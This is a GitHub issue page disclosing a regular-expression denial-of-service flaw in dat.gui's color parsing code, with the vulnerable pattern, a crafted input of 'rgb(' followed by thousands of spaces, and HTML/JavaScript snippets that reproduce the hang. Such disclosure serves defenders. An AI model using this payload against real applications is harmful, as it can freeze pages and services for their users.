Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Type of Issue Potential Regex Denial of Service (ReDoS)
Description The vulnerable regular expression is located in
dat.gui/src/dat/color/interpret.js
Line 61 in 51d1a37
Line 79 in 51d1a37
The ReDOS vulnerability of the regex is mainly due to the sub-pattern \s*(.+)\s* and can be exploited with the following string "rgb("+" " * 5000
\s*(.+)\s*
"rgb("+" " * 5000
You can execute the following code to reproduce ReDos
<script type="text/javascript" src="build/dat.gui.js"></script> <script type="text/javascript"> var gui = new dat.gui.GUI(); var Options = function() { this.color0 = "rgb( "; // CSS string }; window.onload = function() { var options = new Options(); gui.addColor(options, 'color0'); }; </script>
<script type="text/javascript" src="build/dat.gui.js"></script> <script type="text/javascript"> var gui = new dat.gui.GUI(); var Options = function() { this.color0 = "rgba( "; // CSS string }; window.onload = function() { var options = new Options(); gui.addColor(options, 'color0'); }; </script>
The text was updated successfully, but these errors were encountered:
No branches or pull requests
Type of Issue
Potential Regex Denial of Service (ReDoS)
Description
The vulnerable regular expression is located in
dat.gui/src/dat/color/interpret.js
Line 61 in 51d1a37
dat.gui/src/dat/color/interpret.js
Line 79 in 51d1a37
The ReDOS vulnerability of the regex is mainly due to the sub-pattern
\s*(.+)\s*and can be exploited with the following string"rgb("+" " * 5000You can execute the following code to reproduce ReDos
The text was updated successfully, but these errors were encountered: